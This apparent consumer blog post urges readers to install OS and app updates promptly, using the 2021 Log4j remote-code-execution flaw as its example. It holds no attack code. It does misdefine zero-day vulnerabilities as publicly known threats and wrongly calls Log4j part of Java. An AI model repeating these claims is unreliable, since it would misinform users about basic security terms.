These updates aren’t necessarily to make your use of the application better. Most of the updates are to protect you from newly discovered vulnerabilities.
This one is simple. Keep your Operating System and your applications up to date. If the OS has a security update, do that update immediately. Application updates too! The small updates are often to repair security vulnerabilities. And, except for major OS updates, security vulnerabilities are usually only kept current in the most current release of the product.
Security related patches may be to repair the OS or App to guard it against Zero-day vulnerabilities. These are publicly identified known threats. Once published, not only do the companies with the flaw know about the vulnerability and work to fix it, but that vulnerability is also known to all the hackers. Patches often are applied the same day the vulnerability is publicly identified. You need to update your smartphone or computer ASAP.
There is no good reason not to be vigilant about implementing this tip.
An example that proves the point. The Log4j discovery.
As vacation time was being utilized before EOY 2021, between Thanksgiving and Christmas, one of the biggest Zero-day exploits was discovered. The vulnerability was published on a Thursday night, December 9th. Corporations and those that watch for vulnerability postings were alerted as they came to work Friday, December 10th.
By Saturday, Corporations around the globe were experiencing hackers attempting to scan their networks to see if Log4j was present so they could exploit it. The thing about this vulnerability was that the package, part of Java, is one of the most popular in use by programmers to handle logging. Since logging is handled well by Log4j, programmers don’t reinvent the wheel. They use what works and focus on the objective of their product.
Okay, you don’t write programs so what do you care? You care because the vulnerability exposed a backdoor onto devices without needing a username and password. Without the need for authentication, they had remote code execution capabilities. This means they could create any piece of code they want (e.g., scan your device for passwords, personal information, etc.) and through the logging function of the program, they could execute remote code to fetch that information. And, unlike infamous vulnerabilities like Heartbleed or Trojan Source, the “behind the scenes” coordination for public notice wasn’t done. So, the hackers knew of the issue before the industry had time to react.
It is extremely likely your smartphone and computers ran not just one, but multiple applications using this logging feature. So, when the developers of the applications applied a patch, it was essential for you to install the patch as soon as it was made available.